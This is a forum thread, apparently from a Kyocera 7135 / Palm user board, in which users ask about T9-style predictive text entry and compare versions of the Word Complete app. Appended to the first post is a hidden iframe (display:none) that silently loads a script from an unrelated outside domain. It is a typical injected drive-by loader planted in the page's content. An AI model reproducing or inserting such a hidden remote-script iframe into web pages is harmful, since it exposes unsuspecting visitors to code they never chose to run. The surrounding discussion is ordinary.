Predictive text input

I've searched this forum for predictive text input but couldn't find what I was looking for. I found a program called "TextPlus" which is nice but does not do what I would like it to do.

On my old nokia phone, you could enter the numbers: 43556 to spell out Hello. The phone would automatically guess what word you tried to spell and put it on the screen. If it was not the word you were looking for you could press * and it would bring up a new word. If you enter 43356 right now it will spell out Gdkm. The phone won't try and figure out what you are trying to spell.

Is there a program/hack out there that works like the older nokia predictive text inputs used to? I really want something that enters text quickly without the stylus. Thanks to all that take the time to reply.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

T9

When information on the Kyocera 7135 was first announced, it was supposed to have T9 Predictive Text Entry but for some reason, it was not included in the released product. I think the reasoning was that with Graffiti, T9 was not needed but I see no reason T9 and Graffiti (and Graffiti 2) could not work together.

But to answer your question, I know of no application or "hack" that adds this feature to the 7135. There are some programs that include this feature in themselves -- TakePhone comes most reaily to mind -- but I know of nothing that adds this feature to the 7135 itself.

If you find anything, please tell me.

Version?

Which version of Word Complete do you use? I have the 1.0 and it crashes my Kyo all the time. When I disable it, it doesn't crash.
The CIC recommends only upgrading if you are running Palm OS 5.0, but my Kyo is on 4.1.2.....

I just downloaded the Demo version of 3.03 to see if it will be more stable. But that will expire in 5 days...

I can't find my order info for the original 1.0 version if I need to upgrade- bummer Bought it many years ago...

I use Word Complete 3.02 with no problems. It is one of my must have apps on my 7135. I bought it when they had a WC and Jot bundle offer. Worth the money.

I've had WordComplete v. 2.02 for a year and have never had any problems with it.
